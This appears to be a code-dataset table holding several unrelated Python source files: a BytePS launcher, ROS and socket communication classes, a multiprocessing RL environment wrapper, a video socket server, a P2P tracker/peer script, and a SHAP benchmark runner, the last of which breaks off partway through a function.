source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
launch.py
|
#!/usr/bin/python
from __future__ import print_function
import os
import subprocess
import threading
import sys
def worker(local_rank, local_size, command):
my_env = os.environ.copy()
my_env["BYTEPS_LOCAL_RANK"] = str(local_rank)
my_env["BYTEPS_LOCAL_SIZE"] = str(local_size)
if os.getenv("BYTEPS_ENABLE_GDB", 0):
if command.find("python") != 0:
command = "python " + command
command = "gdb -ex 'run' -ex 'bt' -batch --args " + command
subprocess.check_call(command, env=my_env, stdout=sys.stdout, stderr=sys.stderr, shell=True)
if __name__ == "__main__":
print("BytePS launching " + os.environ["DMLC_ROLE"])
sys.stdout.flush()
if os.environ["DMLC_ROLE"] == "worker":
if "NVIDIA_VISIBLE_DEVICES" in os.environ:
local_size = len(os.environ["NVIDIA_VISIBLE_DEVICES"].split(","))
else:
local_size = 1
t = [None] * local_size
for i in range(local_size):
command = ' '.join(sys.argv[1:])
t[i] = threading.Thread(target=worker, args=[i, local_size, command])
t[i].daemon = True
t[i].start()
for i in range(local_size):
t[i].join()
else:
# if "BYTEPS_SERVER_MXNET_PATH" not in os.environ:
# print("BYTEPS_SERVER_MXNET_PATH env not set")
# os._exit(0)
# sys.path.insert(0, os.getenv("BYTEPS_SERVER_MXNET_PATH"))
try:
import mxnet
except ImportError:
raise ImportError(
"Unable to import dependency mxnet. "
"A quick tip is to install via `pip install mxnet-mkl/mxnet-cu100mkl --pre`. "
"please refer to https://gluon-cv.mxnet.io/#installation for details.")
|
run_dash.py
|
import threading
import subprocess
import webbrowser
import time
def run_dash():
"""
Run dash application in this function
and then open then dash url in the new window.
:return: None
"""
proc = subprocess.Popen(['python', './template/only_dash.py'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
t = threading.Thread(target=output_reader, args=(proc,))
t.start()
try:
time.sleep(3)
webbrowser.open('http://localhost:8050')
# assert b'Directory listing' in resp.read()
time.sleep(10)
finally:
proc.terminate()
try:
proc.wait(timeout=1)
print('== subprocess exited with rc =%d', proc.returncode)
except subprocess.TimeoutExpired:
print('subprocess did not terminate in time')
t.join()
return None
# helper functions
def output_reader(proc):
"""
Check if subprocess works correctly.
:param proc: process
:return: None
"""
for line in iter(proc.stdout.readline, b''):
print('got line: {0}'.format(line.decode('utf-8')), end='')
if __name__ == "__main__":
run_dash()
|
communication.py
|
#!/usr/bin/env python
"""Module for managing communication lines
Include class for Java and ROS communication
"""
import abc
from socket import socket, timeout
from threading import Thread
import sys
import time
from std_msgs.msg import String
from sonia_msgs.msg import filterchain_return_message as ret_str
import rospy
import time
from observer import Observable, Observer
import parser
# Set a buffer max size for input from socket and output to ROS line
BUFFER_SIZE = 2048
class AbstractCommunicationLine(Observable, Observer, Thread):
"""Abstract methods and attributes for base communication lines
This will provide a method send to send informations on the line
and will run as a thread to get information from it
"""
__metaclass__ = abc.ABCMeta # ABC class behaves like abstract
def __init__(self):
"""Default constructor, start connexions
"""
Thread.__init__(self)
Observable.__init__(self)
Observer.__init__(self)
self._input_stream = []
self._output_stream = []
self._connected = False
self._running = False
self.daemon = True
self._connect()
self.start()
@abc.abstractmethod
def _connect(self):
"""
"""
raise NotImplementedError(
"Class %s doesn't implement connect()" % self.__class__.__name__)
@abc.abstractmethod
def _process(self):
"""Method launched when object.start() is called on the instanciated
object
"""
raise NotImplementedError(
"Class %s doesn't implement run()" % self.__class__.__name__)
def run(self):
"""Method launched when object.start() is called on the instanciated
object
"""
self._running = True
while self.is_running and not rospy.is_shutdown():
rate = rospy.Rate(28)
self._process()
rate.sleep()
self._running = False
def recv(self):
"""Read ouput stream and empty it
"""
tmp_input_stream = self._input_stream[0]
self._input_stream.remove(self._input_stream[0])
return tmp_input_stream
def stop(self):
"""Stop communication line
"""
self._running = False
@abc.abstractmethod
def send(self, data):
"""Send a message on the line
Abstract method to rewrite
"""
raise NotImplementedError(
"Class %s doesn't implement send()" % self.__class__.__name__)
@property
def is_empty(self):
"""Check if the input stream is empty
"""
if len(self._input_stream):
return False
return True
@property
def is_running(self):
"""Check if the input stream is empty
"""
return self._running
@property
def is_connected(self):
"""Check if the input stream is empty
"""
return self._connected
@abc.abstractmethod
def get_name(self):
raise NotImplementedError
def __exit__(self, exc_type, exc_val, exc_tb):
"""Default Destructor
Destroy the object correctly
"""
self.stop()
class JavaCommunicationLine(AbstractCommunicationLine):
"""An easy to use API for making a dialog on TCP/IP Line
This class is server class and provides reading and writing socket
"""
def __init__(self, host='', port=46626):
"""Default constructor
Initiate variables, Connect the socket and call parent constructor
"""
self.host = host
self.port = port
self._backlog = 5
self._socket = None
self._clients = []
self._started = False
AbstractCommunicationLine.__init__(self)
def _connect(self):
"""Connect to the client socket
"""
try:
self._socket = socket()
self._socket.bind((self.host, self.port))
self._socket.listen(self._backlog)
self._socket.settimeout(2)
self._socket.setblocking(1)
except:
if self._socket:
self._socket.close()
rospy.logerr('Could not open socket')
sys.exit(1)
rospy.loginfo(
'Socket server running at : ' +
str(self.host) + ":" + str(self.port))
# Always accept connexions
self._connexion_thread = Thread(target=self._accept_client)
self._connexion_thread.daemon = True
self._connexion_thread.start()
def _accept_client(self):
while True:
client, client_ip = self._socket.accept()
self._clients = []
self._clients.append((client, client_ip))
rospy.loginfo(
'A client is connected : ' + str(self._clients[-1][1][0]) +
':' + str(self._clients[-1][1][1]))
def stop(self):
"""Close connexion properly
Override parent class to add socket closing process
"""
self._socket.close()
self._started = False
super(JavaCommunicationLine, self).stop()
def _process(self):
"""Method used by thread processing until stop() is used
Will read on the line and notify observer if there is any informations
"""
rospy.logwarn("BEFORE READLINE")
self._read_from_line()
rospy.logwarn("AFTER READLINE")
if not self.is_empty:
self._notify()
rospy.logwarn("BEFORE OUTPUT_STREAM")
if len(self._output_stream):
self._write_to_line()
def _read_from_line(self):
"""Read informations from tcp socket
"""
rospy.logwarn("number of clients : {!s}"
.format(self._clients.__len__()))
for client in self._clients:
try:
rospy.logwarn("123")
line = client[0].recv(2048)
"""line = client[0].makefile().readline().rstrip('\n')"""
rospy.logwarn("1234")
if line:
rospy.logwarn("1235")
rospy.loginfo("I received data from AUV6 : \"" + line + "\"")
if line == "END\n":
rospy.logwarn(
"The client {!s}:{!s} ended the connexion".format(
client[1][0], client[1][1]))
return
self._input_stream.append(line)
except:
rospy.logwarn(sys.exc_info()[0])
def _write_to_line(self):
for client in self._clients:
#rospy.loginfo(
# "I am Sending data to AUV6 on {!s}:{!s} : \"".format(
# client[1][0], client[1][1]) +
# self._output_stream[0] + "\"")
try:
client[0].send(self._output_stream[0] + "\n")
except:
rospy.logerr(
"The client {!s}:{!s} disconnected without "
.format(client[1][0], client[1][1]) +
"closing the connexion")
self._output_stream = self._output_stream[1:]
def send(self, data):
"""Send informations to tcp socket
"""
for client in self._clients:
#rospy.loginfo(
# "I am Sending data to AUV6 on {!s}:{!s} : \"".format(
# client[1][0], client[1][1]) +
# data + "\"")
try:
client[0].send(data + "\n")
except timeout:
rospy.logwarn("socket timeout ! Resetting connection ...")
self.stop()
self._connect()
except:
rospy.logerr(
"The client {!s}:{!s} disconnected without "
.format(client[1][0], client[1][1]) +
"closing the connexion")
rospy.logwarn(sys.exc_info()[0])
def get_name(self):
return "AUV6"
def update(self, subject):
#rospy.loginfo(
# "I am Sending data to AUV6 :::")
self.send(subject.recv())
class ROSTopicCommunicationLine(AbstractCommunicationLine):
"""Initiate a communication with ROS Topic given a writing
and reading topic node_name
"""
def __init__(self, reading_topic, writing_topic=None):
"""Default Constructor
init node and topics
"""
self._writing_topic = writing_topic
self._reading_topic = reading_topic
AbstractCommunicationLine.__init__(self)
def _connect(self):
"""
"""
rospy.loginfo(
"I am subscribing to ROS reading topic : " + self._reading_topic)
rospy.Subscriber(
self._reading_topic, ret_str, self._handle_read_subscribers)
if self._writing_topic:
rospy.loginfo(
"I am subscribing to ROS writing topic : " +
self.writing_topic)
self.publisher = rospy.Publisher(
self._writing_topic, String, queue_size=20)
def _process(self):
"""Method used by thread
simply keeps python from exiting until this node is stopped
"""
if len(self._output_stream):
if self._writing_topic:
rospy.loginfo(
"I am sending data to ROS Topic : \"" +
self._output_stream[0] + "\"")
self.publisher.publish(self._output_stream[0])
self._output_stream = self._output_stream[1:]
else:
rospy.logerr(
"Sorry, you did not provide me any topic to publish on...")
def _handle_read_subscribers(self, data):
"""Method called when receiving informations from Subscribers
"""
self._input_stream.append(data.execution_result)
rospy.loginfo(
"I received data from ROS Topic : \"" +
self._input_stream[-1] +
"\" - ["+ data.execution_result +"] "
)
self._notify()
def stopTopic(self):
self.stop()
def send(self, data):
"""Send informations to publisher
"""
self._output_stream.append(data)
def get_name(self):
return self._reading_topic
class ROSServiceCommunicationLine(AbstractCommunicationLine):
"""Initiate a communication with ROS given a service service_name
"""
def __init__(self, service_name, service_ref):
"""Default constructor subscribe to service
"""
self._service_name = service_name
self._service_ref = service_ref
AbstractCommunicationLine.__init__(self)
def _connect(self):
"""
"""
rospy.loginfo("I am connecting to Vision Server ROS service")
self._service_response = rospy.ServiceProxy(
self._service_name, self._service_ref)
def _process(self):
"""Method used by thread
simply keeps python from exiting until this node is stopped
"""
if len(self._output_stream):
rospy.wait_for_service(self._service_name)
try:
rospy.loginfo(
"I am sending data to Vision Server : \"" +
"node_name : " + self._output_stream[0][0] +
" filterchain_name : " + self._output_stream[0][1] +
" media_name : " + self._output_stream[0][2] +
" cmd : " + str(self._output_stream[0][3]) + "\"")
self._input_stream.append(str(self._service_response(
self._output_stream[0][0], self._output_stream[0][1],
self._output_stream[0][2], self._output_stream[0][3])))
self._output_stream = self._output_stream[1:]
if not self.is_empty:
rospy.loginfo(
"I received data from Vision Server : \"" +
self._input_stream[-1] + "\"")
self._notify()
except rospy.ServiceException, e:
rospy.logerr("Service call failed: %s" % e)
def send(self, node_name, filterchain_name, media_name, cmd):
"""Loop and get information from service
"""
self._output_stream.append((
node_name, filterchain_name, media_name, cmd))
def update(self, subject):
"""
"""
splitted = subject.recv().split("\n")
for line in splitted:
parsed_str = parser.parse_from_java(line)
if parsed_str is not None:
print("sending informations")
self.send(parsed_str[0], parsed_str[1], parsed_str[2], parsed_str[3])
def get_name(self):
return self._service_name
|
subproc_vec_env.py
|
import multiprocessing as mp
from collections import OrderedDict
from typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union
import gym
import numpy as np
from hmlf import spaces
from hmlf.environments.vec_env.base_vec_env import CloudpickleWrapper, VecEnv, VecEnvIndices, VecEnvObs, VecEnvStepReturn
def _worker(
remote: mp.connection.Connection, parent_remote: mp.connection.Connection, env_fn_wrapper: CloudpickleWrapper
) -> None:
# Import here to avoid a circular import
from hmlf.common.env_util import is_wrapped
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info["terminal_observation"] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset()
remote.send(observation)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
elif cmd == "is_wrapped":
remote.send(is_wrapped(env, data))
else:
raise NotImplementedError(f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns: List[Callable[[], gym.Env]], start_method: Optional[str] = None):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in mp.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
ctx = mp.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions: np.ndarray) -> None:
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self) -> VecEnvStepReturn:
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
for idx, remote in enumerate(self.remotes):
remote.send(("seed", seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self) -> VecEnvObs:
for remote in self.remotes:
remote.send(("reset", None))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
def close(self) -> None:
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def env_is_wrapped(self, wrapper_class: Type[gym.Wrapper], indices: VecEnvIndices = None) -> List[bool]:
"""Check if worker environments are wrapped with a given wrapper"""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("is_wrapped", wrapper_class))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices: VecEnvIndices) -> List[Any]:
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs: Union[List[VecEnvObs], Tuple[VecEnvObs]], space: spaces.Space) -> VecEnvObs:
"""
Flatten observations, depending on the observation space.
:param obs: observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return: flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(obs, (list, tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, spaces.Dict):
assert isinstance(space.spaces, OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(obs[0], dict), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs])) for k in space.spaces.keys()])
elif isinstance(space, spaces.Tuple):
assert isinstance(obs[0], tuple), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
|
email.py
|
from threading impor Thread
from flask_mail import Message
from flask import current_app, render_template
#from . import mail
def send_async_mail(message):
#with app.app_context():
#mail.send(message)
pass
def welcome_mail(user):
message = Message('Bienvenido!',
sender=current_app.config['MAIL_USERNAME'],
recipients=[user.email])
message.html = render_template('email/welcome.hmtl', user=user)
thread = Thread(target=send_async_mail, args=[message])
thread.start()
|
VideoServer.py
|
import netifaces
import SocketServer,threading
# Network stream object.
# Open a server to send bytes to clients.
def getPreferredIp( ) :
for myIf in ['eth0', 'wlan0' ]:
try :
iface = netifaces.ifaddresses( myIf).get(netifaces.AF_INET)
if iface == None:
continue
print "Iface is %s" %iface
# Assume first hardware card on interface...
myAddress = iface[0]['addr']
return myAddress
except:
raise ValueError ("No Interface found")
_videoServer = None
# Thread created when a new connection is made to the socket.
# The write method sends data to the client connection. (We're the server)
class ServerInstance(SocketServer.StreamRequestHandler):
def handle( self ) :
_videoServer.add (self)
try:
while True:
self.data = self.rfile.readline()
if self.data == '' :
break
finally:
self.rfile.close()
_videoServer.remove(self)
def write ( self, data ):
self.wfile.write ( data )
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
# The camera calls this when it has new data to transmit to the
# attached clients.
# Note that this is a singleton.
#
class VideoServer :
def __init__ ( self ):
global _videoServer
if _videoServer:
raise ValueError ("Video Server already created")
_videoServer = self
self.connections = list()
self.portNumber = 8000
self.host = getPreferredIp()
self.server = None
self.server_thread = None
# Broadcast data to connections.
def write (self,data):
for c in self.connections:
try:
c.write( data )
except:
pass
# Remove connection from list.
def remove ( self, connection):
self.connections.remove (connection)
# Add connection to list
def add ( self, connection):
self.connections.append(connection)
def start ( self ):
self.server = ThreadedTCPServer ((self.host,self.portNumber), ServerInstance)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon=True
self.server_thread.start()
# Not implemented.
def finish ( self):
pass
class GetVsPort:
def __init__(self, vs ):
self.vs = vs
def run ( self, string , tokens ) :
return str(self.vs.portNumber)
class SetVsPort:
def __init__(self, vs ):
self.vs = vs
def run ( self, string , tokens ) :
try:
value = int(tokens[1])
self.vs.portNumber = value
except:
pass
return str(self.vs.portNumber)
def initVideoServer( myHandler ):
vs = VideoServer ( )
myHandler.addInstance ( 'getvsport' , GetVsPort (vs))
myHandler.addInstance ( 'setvsport' , SetVsPort (vs))
vs.start()
return vs
|
main.py
|
import logging
import os
import socket
import sys
import threading
from client_connection import PeerConnectionThread, TrackerConnectionThread
from pathlib import Path
from db_operations import DataBase
from models.peer_info import PeerInfo
from peer import Peer
from models.product import Product
from tracker import Tracker
from uuid import uuid4
HOST, PORT = "0.0.0.0", 23456
killswitch = False
current_path = str(Path(__file__))
log_dir = os.path.join(os.path.normpath(current_path + os.sep + os.pardir), "logs")
log_fname = os.path.join(log_dir, "tracker.log")
os.makedirs(os.path.dirname(log_fname), exist_ok=True)
logging.basicConfig(
filename=log_fname,
filemode="a",
format="%(asctime)s - %(levelname)s - %(message)s",
datefmt="%d-%b-%y %H:%M:%S",
level=logging.DEBUG,
)
def start_tracker():
global killswitch
tracker = Tracker(uuid4(), HOST, PORT, geoloc="Istanbul")
all_threads = []
with socket.socket() as server_socket:
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((HOST, PORT))
server_socket.listen(0)
# server_socket.settimeout(10)
logging.debug("Tracker starting up...")
print("racker starting up...")
print("Listening...")
while True:
try:
(client_socket, client_address) = server_socket.accept()
logging.info(f"New connection from IP:{client_address[0]}")
client_socket.settimeout(0.8)
new_thread = TrackerConnectionThread(
tracker, client_socket, client_address
)
all_threads.append(new_thread)
new_thread.start()
if killswitch:
break
except socket.timeout:
#print("Timeout! Tracker shutting down...", e)
#logging.debug("Timeout! Tracker shutting down...")
#return
if killswitch:
break
else:
continue
except KeyboardInterrupt:
for thread in all_threads:
thread.join()
logging.debug("Tracker shutting down...")
return
peer = None
def start_intelligent_home():
global peer
global killswitch
if len(sys.argv) < 4:
info()
raise Exception("Command line expect tracker ip and port")
all_threads = []
PORT = port = int(sys.argv[3])
HOST = host = sys.argv[2]
dbname = "mydb"
if len(sys.argv) == 5:
dbname = sys.argv[4]
peer = Peer(uuid4(), host, port, geoloc="Istanbul")
db = DataBase(db_name=dbname)
for raw_peer_info in db.read_peers_as_list():
name,uuid,ip,port,desc,location = raw_peer_info
peer_info = PeerInfo(uuid,ip,port,location,"A",keywords=name+desc)
peer.register(peer_info)
for product_info in db.read_products_as_list():
p_name, p_unit, p_desc, p_amount = product_info
keywords = [kw.strip().lower() for kw in p_desc.split(",")]
new_product = Product(p_name, p_unit, p_amount, keywords)
peer.add_product(new_product)
with socket.socket() as server_socket:
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((HOST, PORT))
server_socket.listen(0)
server_socket.settimeout(1)
print("Listening...")
while True:
try:
(client_socket, client_address) = server_socket.accept()
#client_socket.settimeout(0.8)
if client_address in peer.block_list:
client_socket.send("BL::T\n".encode())
client_socket.close()
logging.info(f"Rejeted connection from blocked IP:{client_address[0]}")
continue
logging.info(f"New connection from IP:{client_address[0]}")
new_thread = PeerConnectionThread(peer, client_socket, client_address)
all_threads.append(new_thread)
new_thread.start()
if killswitch:
break
except socket.timeout as e:
if killswitch:
break
else:
continue
except KeyboardInterrupt:
for thread in all_threads:
thread.join()
logging.debug("Tracker shutting down...")
return
for thread in all_threads:
thread.is_listening = False
thread.join()
# To start Peer use -a command line
def info():
print(
"Arguments: [node option] [connection option]",
"node option for peer: -a , connection option: {ip} {port}",
"node option for tracker: -t",
sep="\n",
)
def main():
global killswitch
if len(sys.argv) == 1:
info()
return
elif sys.argv[1] == "-t":
start_tracker()
elif sys.argv[1] == "-a":
peer_thread = threading.Thread(target=start_intelligent_home)
peer_thread.start()
from app import AppUi
while peer is None:
pass
app_ui = AppUi(peer)
app_ui.run()
killswitch = True
peer_thread.join()
if __name__ == "__main__":
main()
|
experiments.py
|
from __future__ import print_function
from .. import datasets
from . import metrics
from . import models
from . import methods
from .. import __version__
import numpy as np
import sklearn
import os
import pickle
import sys
import time
import subprocess
from multiprocessing import Pool
import itertools
import copy
import random
import time
try:
from queue import Queue
except ImportError:
from Queue import Queue
from threading import Thread, Lock
regression_metrics = [
"runtime",
"local_accuracy",
"consistency_guarantees",
"mask_keep_positive",
"mask_keep_negative",
"keep_positive",
"keep_negative",
"batch_keep_absolute__r2",
"mask_remove_positive",
"mask_remove_negative",
"remove_positive",
"remove_negative",
"batch_remove_absolute__r2"
]
binary_classification_metrics = [
"runtime",
"local_accuracy",
"consistency_guarantees",
"mask_keep_positive",
"mask_keep_negative",
"keep_positive",
"keep_negative",
"batch_keep_absolute__roc_auc",
"mask_remove_positive",
"mask_remove_negative",
"remove_positive",
"remove_negative",
"batch_remove_absolute__roc_auc"
]
linear_regress_methods = [
"linear_shap_corr",
"linear_shap_ind",
"coef",
"random",
"kernel_shap_1000_meanref",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
linear_classify_methods = [
# NEED LIME
"linear_shap_corr",
"linear_shap_ind",
"coef",
"random",
"kernel_shap_1000_meanref",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
tree_regress_methods = [
# NEED tree_shap_ind
# NEED split_count?
"tree_shap",
"saabas",
"random",
"tree_gain",
"kernel_shap_1000_meanref",
"mean_abs_tree_shap",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
tree_classify_methods = [
# NEED tree_shap_ind
# NEED split_count?
"tree_shap",
"saabas",
"random",
"tree_gain",
"kernel_shap_1000_meanref",
"mean_abs_tree_shap",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
deep_regress_methods = [
"deep_shap",
"expected_gradients",
"random",
"kernel_shap_1000_meanref",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
]
_experiments = []
_experiments += [["corrgroups60", "lasso", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["corrgroups60", "ridge", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["corrgroups60", "decision_tree", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "random_forest", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "gbm", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "ffnn", m, s] for s in regression_metrics for m in deep_regress_methods]
_experiments += [["cric", "lasso", m, s] for s in binary_classification_metrics for m in linear_classify_methods]
_experiments += [["cric", "ridge", m, s] for s in binary_classification_metrics for m in linear_classify_methods]
_experiments += [["cric", "decision_tree", m, s] for s in binary_classification_metrics for m in tree_regress_methods]
_experiments += [["cric", "random_forest", m, s] for s in binary_classification_metrics for m in tree_regress_methods]
_experiments += [["cric", "gbm", m, s] for s in binary_classification_metrics for m in tree_regress_methods]
#_experiments += [["cric", "ffnn", m, s] for s in binary_classification_metrics for m in deep_regress_methods]
def experiments(dataset=None, model=None, method=None, metric=None):
for experiment in _experiments:
if dataset is not None and dataset != experiment[0]:
continue
if model is not None and model != experiment[1]:
continue
if method is not None and method != experiment[2]:
continue
if metric is not None and metric != experiment[3]:
continue
yield experiment
def run_experiment(experiment, use_cache=True, cache_dir="/tmp"):
dataset_name, model_name, method_name, metric_name = experiment
# see if we have a cached version
cache_id = __gen_cache_id(experiment)
cache_file = os.path.join(cache_dir, cache_id + ".pickle")
if use_cache and os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
#print(cache_id.replace("__", " ") + " ...loaded from cache.")
return pickle.load(f)
# compute the scores
print(cache_id.replace("__", " ") + " ...")
sys.stdout.flush()
start = time.time()
X,y = getattr(datasets, dataset_name)()
score = getattr(metrics, metric_name)(
X, y,
getattr(models, dataset_name+"__"+model_name),
method_name
)
print("...took %f seconds.\n" % (time.time() - start))
# cache the scores
with open(cache_file, "wb") as f:
pickle.dump(score, f)
return score
def run_experiments_helper(args):
experiment, cache_dir = args
return run_experiment(experiment, cache_dir=cache_dir)
def run_experiments(dataset=None, model=None, method=None, metric=None, cache_dir="/tmp", nworkers=1):
experiments_arr = list(experiments(dataset=dataset, model=model, method=method, metric=metric))
if nworkers == 1:
out = list(map(run_experiments_helper, zip(experiments_arr, itertools.repeat(cache_dir))))
else:
with Pool(nworkers) as pool:
out = pool.map(run_experiments_helper, zip(experiments_arr, itertools.repeat(cache_dir)))
return list(zip(experiments_arr, out))
nexperiments = 0
total_sent = 0
total_done = 0
total_failed = 0
host_records = {}
worker_lock = Lock()
ssh_conn_per_min_limit = 5
def __thread_worker(q, host):
global total_sent, total_done
hostname, python_binary = host.split(":")
while True:
experiment = q.get()
# make sure we are not sending too many ssh connections to the host
while True:
all_clear = False
worker_lock.acquire()
try:
if hostname not in host_records:
host_records[hostname] = []
if len(host_records[hostname]) < ssh_conn_per_min_limit:
all_clear = True
elif time.time() - host_records[hostname][-ssh_conn_per_min_limit] > 60:
all_clear = True
finally:
worker_lock.release()
# if we are clear to send a new ssh connection then break
if all_clear:
break
# if we are not clear then we sleep and try again
time.sleep(5)
# record how many we have sent off for executation
worker_lock.acquire()
try:
total_sent += 1
__print_status()
finally:
worker_lock.release()
__run_remote_experiment(experiment, hostname, python_binary=python_binary)
# record how many are finished
worker_lock.acquire()
try:
total_done += 1
__print_status()
finally:
worker_lock.release()
q.task_done()
def __print_status():
print("Benchmark task %d of %d done (%d failed, %d running)" % (total_done, nexperiments, total_failed, total_sent - total_done), end="\r")
sys.stdout.flush()
def run_remote_experiments(experiments, thread_hosts, rate_limits={}):
""" Use ssh to run the experiments on remote machines in parallel.
Parameters
----------
experiments : iterable
Output of shap.benchmark.experiments(...).
thread_hosts : list of strings
Each host has the format "host_name:path_to_python_binary" and can appear multiple times
in the list (one for each parallel execution you want on that machine).
"""
# first we kill any remaining workers from previous runs
# note we don't check_call because pkill kills our ssh call as well
thread_hosts = copy.copy(thread_hosts)
random.shuffle(thread_hosts)
for host in set(thread_hosts):
hostname,_ = host.split(":")
try:
subprocess.run(["ssh", hostname, "pkill -f shap.benchmark.run_experiment"], timeout=15)
except subprocess.TimeoutExpired:
print("Failed to connect to", hostname, "after 15 seconds! Exiting.")
return
global nexperiments
experiments = copy.copy(list(experiments))
random.shuffle(experiments) # this way all the hard experiments don't get put on one machine
nexperiments = len(experiments)
q = Queue()
for host in thread_hosts:
worker = Thread(target=__thread_worker, args=(q, host))
worker.setDaemon(True)
worker.start()
for experiment in experiments:
q.put(experiment)
q.join()
def __run_remote_experiment(experiment, remote, cache_dir="/tmp", python_binary="python"):
global total_failed
dataset_name, model_name, method_name, metric_name = experiment
# see if we have a cached version
cache_id = __gen_cache_id(experiment)
cache_file = os.path.join(cache_dir, cache_id + ".pickle")
if os.path.isfile(cache_file):
